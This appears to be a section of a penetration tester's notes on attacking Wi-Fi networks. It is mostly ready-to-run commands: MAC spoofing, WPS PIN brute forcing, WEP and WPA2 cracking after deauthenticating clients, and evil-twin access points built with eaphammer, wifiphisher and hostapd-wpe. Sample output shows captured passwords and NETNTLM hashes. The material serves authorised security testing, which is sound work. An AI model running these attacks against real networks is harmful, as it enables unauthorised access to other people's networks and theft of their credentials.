WIFI

Introduction

The WIFI section of the Information gathering phase explained how to discover the company's wireless Access Points and their clients. So, in this section, you will find some methods about how to crack them.

MAC address access control

Despite having authentication methods, some networks also have access control lists based on the MAC address of the devices. Nevertheless, this can be bypassed pretty easily by changing the attacker's MAC address by one of the network's stations.

# 1. Option
sudo macchanger -m <XX:XX:XX:XX:XX:XX> <IF>
# 2. Option
sudo ifconfig <IF> down
sudo ifconfig <IF> hw ether <XX:XX:XX:XX:XX:XX>
sudo ifconfig <IF> up

Authentication tests

Depending on the authentication mechanisms implemented by the wireless networks, exists different methods to retrieve the password to access the network. However, all these mechanisms require of brute force attacks.

WPS Attacks

In order to obtain the PIN we can use reaver or bully.

sudo reaver -i <MON_IF> -b <AP_MAC> -vvNwf [-K {1|2|3}] -c <CHANNEL>
sudo bully <MON_IF> -b <AP_MAC> -c <CHANNEL> -S -F -B -v 3

K: Run pixiedust attack
vv: Verbose
N: Do not send NACK messages when out-of-order packets are received
w: Mimic a W7 registrar
f: Disable channel hopping

Note: I have not been able on any a single AP to obtain the PIN

If the WPS pin has been found we can ask the AP to provide the WPA key.

sudo reaver -i <MON_IF> -b <AP_MAC> -vvNwf -c <CHANNEL> -p <FOUND_IP>

Capture and Handshake cracking

Wired Equivalent Privacy (WEP)

After detecting the WEP target network, the attacker can use besside-ng (It also works for WPA -W) which does the job pretty easily, returning the WEP key in hexadecimal (It can be converted using a HEX to ASCII converter). Nonetheless, you can always use aircrack-ng to obtain the ASCII version aircrack-ng <WEP.PCAP>.

besside-ng -c <CHANNEL> -b <BSSID_MAC> <MON_IF>

Note: The application can crash while attacking the AP; keep trying until obtaining the WEP key.

Wi-Fi Protected Access (WPA2-PSK)

WPA2 replaced WEP due to its several weaknesses. However, WPA2-PSK still has flaws because the encrypted Pre-Shared Key (PSK) is shared during the process 4-way handshake. Hence, an attacker could sniff those network packets for password cracking in the future.

The attack process is the following:

1. Capture the target's AP traffic.

airodump-ng --bssid <TARGET_BSSID> -c <CHANNEL> --write <OUTPUT_CAP> <MON_I>

2. Deauthenticating a client or the entire network (More changes to obtain a handshake). keep doing this step until you get the "WPA handshake: XXXXX" message on airodump.

# The whole network
aireplay-ng -0 <NUM_DEAUTH_PKTS> -a <TARGET_BSSID> <MON_IF>
# A client
aireplay-ng -0 100 -a <TARGET_BSSID> -c <CLIENT_MAC> <MON_IF>

3. Cracking the password with dictionary attacks can be done with aircrack-ng or hashcat, being the latter faster.

# Aircrack
aircrack-ng -w <WORDLIST> -b <TARGET_BSSID> <FILE_CAP>
#Hashcat
hcxpcapngtool $(find . -name *.cap) -o <HANDSHAKES.txt>
hashcat -m 22000 <HANDSHAKES.TXT> <WORDLIST.TXT>

Note: If you want to perform a brute force attack to crack the password, you can use the following command.

crunch <MIN_LENGTH> <MAX_LENGTH> <CHARACTERS> | aircrack-ng -w - -b <TARGET_BSSID> <FILE_PCAP>

EAP-MD5

EAP-MD5 is a legacy authentication mechanism that does not provide sufficient protection for user authentication credentials. Users who authenticate using EAP-MD5 subject themselves to an offline dictionary attack vulnerability.

The tool eapmd5pass can be used to retrieve the EAP-MD5 authentication exchange and start a dictionary attack against the user's password.

EAP live brute force

The WPA-EAP APs require of a user and a password to authenticate against the network. You can use the following tools for wireless networks to brute force some credentials.

Note: These tools are sometimes hard to set up in updated environments and, depending on the authentication protocol, might not work.

Furthermore, another test that could be performed is to try to block user accounts using a user provided by the company and make a lot of failed login attempts.

Phishing

The wireless phishing attack consists of creating an evil twin AP while performing a deautentication attack against the target AP, to trick the victim into login into our fake AP and obtaining some credentials.

WPA-PSK

For environments that use WPA/2 with Pre-Shared key authentication, like a house or a small business, several tools can be used to create a fake access point, tricking the victim into providing the key. These tools are:

eaphammer creates an evil twin in order to retrieve the handshake for later cracking.

# The obtained file is: loot/wpa_handshake_capture*.hccapx
sudo ./eaphammer -i <IF> --channel <CHANNEL> --auth wpa-psk --essid <TARGET_ESSID> --ssid <TARGET_BSSID> --creds

After obtaining the handshake needs several transformations before being cracked with HashCat. You need to use hcxhash2cap and hcxpcapngtool from hcxtools to transform the hccapx file into a hash.

./hcxhash2cap --hccapx=<HANDSHAKE.hccapx> -c <OUTPUT.cap>
./hcxpcapngtool <OUTPUT.cap> -o <HASH.TXT>
hashcat -a 0 -m 22000 <HASH.TXT> <WORDLIST.TXT>

Wifiphisher in a very simple way creates a fake access point with a phishing webpage (it can be changed), inducing the victim to enter the wireless AP key. Furthermore, if a second wireless network interface is provided, it also makes a deautentication attack against the victim AP.

sudo wifiphiser
[...]
[*] POST request from 10.0.0.61 with wfphshr-wpa-password=password1234

WIFI-Enterprise

In order to obtain some credentials to access the network, you can create fake access points such as evil-twins, making the client connect to your AP and providing the credentials for later use.

For doing this type of attack you can choose between eaphammer or hostpad-wpe, depending on your hacking environment, if you are using WIFI pineapples or a kali machine.

Eaphammer - Kali

Installation & Configuration

Because the version that is on the Kali Linux repositories has a programming error, you need to download the one from the GitHub repositories.

git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
sudo ./kali-setup
# Create the certificate with the data of your victim's certificate in order to be more trusted.
sudo python3 eaphammer --cert-wizard

Attack

To set the rogue access point use the following command and do to forget to deautenticate the original AP.

sudo python3 eaphammer -i <IF> --channel <CHANNEL> --auth wpa-eap --essid <VICTIMS_SSID> --creds

[...]
# Mobile
         username:      pepe
         password:      palotes
[...]
# Windows
         domain\username:               pepe
         username:                      pepe
         challenge:                     c9:fa:47:6b:34:ca:b4:ea
         response:                      25:44:19:55:4f:a1:9f:b5:68:00:58:67:e3:58:00:ed:6f:0d:3d:6f:b2:7d:63:ab
         jtr NETNTLM:                   pepe:$NETNTLM$c9fa476b34cab4ea$254419554fa19fb568005867e35800ed6f0d3d6fb27d63ab
         hashcat NETNTLM:               pepe::::254419554fa19fb568005867e35800ed6f0d3d6fb27d63ab:c9fa476b34cab4ea

Hostpad-wpe (Pinneaple v2.1.0)

With hostpad-wpe we can create a fake radius AP where the users can log in to obtain its credentials, that will require a post cracking phase.

For the latest version of the pineapple is more challenging to install, due to there is not available modules on the repositories. So, you will need to execute the following commands.

# Installation
wget https://github.com/jekkos/hostapd-wpe-openwrt/releases/download/2/hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk
wget https://github.com/jekkos/hostapd-wpe-openwrt/releases/download/2/hostapd-wpe_git-2_mips_24kc.ipk
scp hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk root@<PINEAPPLE_IP>:/tmp/
scp hostapd-wpe_git-2_mips_24kc.ipk root@<PINEAPPLE_IP>:/tmp/
opkg install /tmp/hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk
opkg install /tmp/hostapd-wpe_git-2_mips_24kc.ipk
opkg update && opkg install coreutils-nohup

# Configuration
# By default it doesn't show the challgenge respose, so we need to add the following lines
echo "eap_server=1" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_a_id=101112131415161718191a1b1c1d1e1f" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_a_id_info=hostapd-wpe" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_prov=3" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "ieee8021x=1" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_key_lifetime=604800" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_key_refresh_time=86400" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f" >> /etc/hostapd-wpe/hostapd-wpe.conf
sed -i 's/^ctrl_interface=\/var\/run\/hostapd$/&-wpe/' /etc/hostapd-wpe/hostapd-wpe.conf

Configuration

Then, we need to modify the hostapd-wpe.conf file setting the wireless interface that we are going to use, the name of the ssid that we want to spoof and the channel where this AP emits.

sudo vim /etc/hostapd-wpe/hostapd-wpe.conf 
[...]
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=<WIRELESS_IF>
[...]
# 802.11 Options
ssid=<SSID_NAME>
channel=<VICTIM_SSID_CHANNEL>

Attack

After that, we need to deautenticate the victim AP, execute hostapd-wpe and wait for users to log in. For doing so, execute the following commands.

Deautenticate the AP:

aireplay-ng -0 <#PACKETS_TO_SEND> -a <AP_BSSID> <IF>

Execute hostapd-wpe:

sudo hostapd-wpe -i <IF> -k -s /etc/hostapd-wpe/hostapd-wpe.conf

[...]

mschapv2: Thu Jun  9 07:04:16 2022
         username:      pepito
         challenge:     35:0a:18:49:63:83:ee:76
         response:      fc:65:5a:02:73:9f:89:a5:95:e5:8e:8f:4b:1b:72:0e:9e:d1:04:03:ee:b5:bd:ea
         jtr NETNTLM:           pepito:$NETNTLM$350a18496383ee76$fc655a02739f89a595e58e8f4b1b720e9ed10403eeb5bdea
         hashcat NETNTLM:       pepito::::fc655a02739f89a595e58e8f4b1b720e9ed10403eeb5bdea:350a18496383ee76

-k: Karma Mode (Respond to all probes)
-s: Return Success where possible

Note: The device is never going to be able to connect to the AP and get Internet, automatically it will be disconnected due to wrong credentials. That occurs because our fake radius server does not have the credentials that the victim is providing.

Finally, we need to put every hashcat NETNTLM into a file for offline cracking.

hashcat -m 5500 <HASHCAT_NETNTLM_FILE> <WORLDIST>

Simple Radius AP with Internet

It may be the case that you need an access point with internet access for personal reasons or for man-in-the-middle attacks. Whatever the case, here's how to do it.

Note: The environment is a VM Kali machine, it might not work on other distros or require more steps.

Note 2: Depending on your network card, you might not be able to log in despite the ESSID being broadcasted, try using another.

Installation

1. you need to install the following programs.

sudo apt install hostapd-wpe hostapd dnsmasq iptables-persistent -y

2. Modify the file /etc/dnsmasq.conf for dnsmasq to obtain a DHCP server.

interface=wlan0
listen-address=127.0.0.1
dhcp-range=10.0.0.3,10.0.0.20,255.255.255.0,12h
server=8.8.8.8
server=8.8.4.4

3. Because Kali comes with systemd-resolved you avoid the conflicts with dnsmasq. To do so, change the file /etc/systemd/resolved.conf and add the following line.

DNSStubListener=no

4. Add a user to login into the AP. For doing so, you need to edit the file /etc/hostapd-wpe/hostapd-wpe.eap_user. Here you have some examples:

* PEAP,TTLS,TLS,FAST 
"test"      TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2  "test"  [2]
"user"      TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2  "password"  [2]

5. Configure the machine to allow IP forward persistently.

echo net.ipv4.ip_forward=1 | sudo tee -a /etc/sysctl.conf
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT

Execution

Every time, you restart your virtual machine you will need to set a static IP to your external network card and restart dnsmasq to detect the wlan0 interface with an IP.

sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0
sudo systemctl restart dnsmasq

Finally, you need to execute hostapd with the configuration file at /etc/hostapd-wpe/hostapd-wpe.conf. In there, you can change the channel, ESSID, protocols, etc.

sudo hostapd -i wlan0 /etc/hostapd-wpe/hostapd-wpe.conf